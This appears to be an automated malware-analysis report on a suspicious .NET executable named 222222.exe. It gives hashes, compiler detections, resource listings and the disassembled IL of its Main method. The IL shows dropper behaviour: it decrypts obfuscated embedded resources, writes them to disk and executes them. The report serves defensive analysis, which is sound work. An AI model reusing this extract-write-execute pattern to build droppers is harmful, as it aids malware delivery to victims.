Suspicious
Suspect

4677e7b998901e572f93e8b1ba65a90d

PE Executable | MD5: 4677e7b998901e572f93e8b1ba65a90d | Size: 16.88 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score: High

Hash
MD5: 4677e7b998901e572f93e8b1ba65a90d
Sha1: aaae7fbf53743b155caa505326ddb4a23a807adb
Sha256: 86d42bfe401a938d6c4310d5750d4f45bdaa778159b0fa318dc70b855056389c
Sha384: 706e605a5c520f4c786be59aec43b9aad323b30c55f7975482ad466c47b0596b1701ae9aac14a58fd65a54571d519e82
Sha512: 19c33eb7177eab148481aa04df0f554650c07283c37bb72ba5ba6904c1fc81f7256805dd11017af52d657bb56d86d54fb63c0a107247da3d1647a8d9d986ed95
SSDeep: 393216:fzkHWHy9m4LnZjHG4Za7RG/iIk7mLP99jRbrzPBnvkj4j:fIHWHyXLnZj1a7MSkpRbrThvkS
TLSH: 3E07333AE1802F47FCA9997DD9FFE64367A7F2F02C7D916584828EF1588495D0A36203

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET

File Structure
Structure
  DosHeader
  PE Header
  Optional Header (x86)
  Section Headers
    .text
    .rsrc
    .reloc
  Resources
    RT_VERSION
      ID:0001
        ID:0
    RT_MANIFEST
      ID:0001
        ID:0
  .Net Resources
    zjkzvjriirverefm.Resources
      frblqqkgwdzdgspp
      hhgzdfssurwsgkmv
      jbuwutmgzrczutxs

Information
Info: PE Detect: PeReader OK (file layout)
Module Name: 222222.exe
Full Name: 222222.exe
EntryPoint: System.Void yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::Main()
Scope Name: 222222.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: 222222
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 19
Main Method: System.Void yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::Main()
Main IL Instruction Count: 138

Main IL

ldc.i4.3 <null>
newarr System.String[]
stloc.s V_4
ldloc.s V_4
ldc.i4.0 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_5
ldloc.s V_5
ldc.i4.0 <null>
ldstr U0udGU8uKUUajNx8IhSEiQ==
stelem.ref <null>
ldloc.s V_5
ldc.i4.1 <null>
ldstr 4X60Xay4mcinInKuVf30Lw==
stelem.ref <null>
ldloc.s V_5
ldc.i4.2 <null>
ldstr jbuwutmgzrczutxs
stelem.ref <null>
ldloc.s V_5
ldc.i4.3 <null>
ldstr cCNKEWnoSz7jlRwYEVWKkw==
stelem.ref <null>
ldloc.s V_5
stelem.ref <null>
ldloc.s V_4
ldc.i4.1 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_6
ldloc.s V_6
ldc.i4.0 <null>
ldstr U0udGU8uKUUajNx8IhSEiQ==
stelem.ref <null>
ldloc.s V_6
ldc.i4.1 <null>
ldstr iXDv2l141jXzUyKHUpSrpg==
stelem.ref <null>
ldloc.s V_6
ldc.i4.2 <null>
ldstr hhgzdfssurwsgkmv
stelem.ref <null>
ldloc.s V_6
ldc.i4.3 <null>
ldstr cCNKEWnoSz7jlRwYEVWKkw==
stelem.ref <null>
ldloc.s V_6
stelem.ref <null>
ldloc.s V_4
ldc.i4.2 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_7
ldloc.s V_7
ldc.i4.0 <null>
ldstr m8NEAnShlF10q8AnjMm+Og==
stelem.ref <null>
ldloc.s V_7
ldc.i4.1 <null>
ldstr UTDukSUK7c49y3qsoo3fGYaXDPfO01k2Pcp44BKp0Mg=
stelem.ref <null>
ldloc.s V_7
ldc.i4.2 <null>
ldstr frblqqkgwdzdgspp
stelem.ref <null>
ldloc.s V_7
ldc.i4.3 <null>
ldstr cCNKEWnoSz7jlRwYEVWKkw==
stelem.ref <null>
ldloc.s V_7
stelem.ref <null>
ldloc.s V_4
stloc.0 <null>
ldstr zjkzvjriirverefm
call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly)
stloc.1 <null>
ldc.i4.0 <null>
stloc.2 <null>
br.s IL_012D: ldloc.2
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.0 <null>
ldelem.ref <null>
ldstr jxHlyaBjp+2NQa+xCz2kDsR59eD1bH9Ud2ev+LtRoxA=
call System.Boolean System.String::op_Equality(System.String,System.String)
brtrue.s IL_00D7: call System.String System.IO.Directory::GetCurrentDirectory()
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.0 <null>
ldelem.ref <null>
call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String)
call System.String System.Environment::GetEnvironmentVariable(System.String)
br.s IL_00DC: ldloc.0
call System.String System.IO.Directory::GetCurrentDirectory()
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.1 <null>
ldelem.ref <null>
call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String)
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.3 <null>
ldloc.3 <null>
ldloc.1 <null>
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.2 <null>
ldelem.ref <null>
callvirt System.Object System.Resources.ResourceManager::GetObject(System.String)
castclass System.Byte[]
call System.Byte[] yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::cdeaqnuqstsmrgvuauucpytchtlpqh(System.Byte[])
call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[])
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.3 <null>
ldelem.ref <null>
call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String)
ldstr cCNKEWnoSz7jlRwYEVWKkw==
call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String)
call System.Boolean System.String::op_Equality(System.String,System.String)
brfalse.s IL_0129: ldloc.2
ldloc.3 <null>
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String)
pop <null>
ldloc.2 <null>
ldc.i4.1 <null>
add <null>
stloc.2 <null>
ldloc.2 <null>
ldc.i4.3 <null>
blt.s IL_00B5: ldloc.0
ret <null>

No malware configuration was found at this point.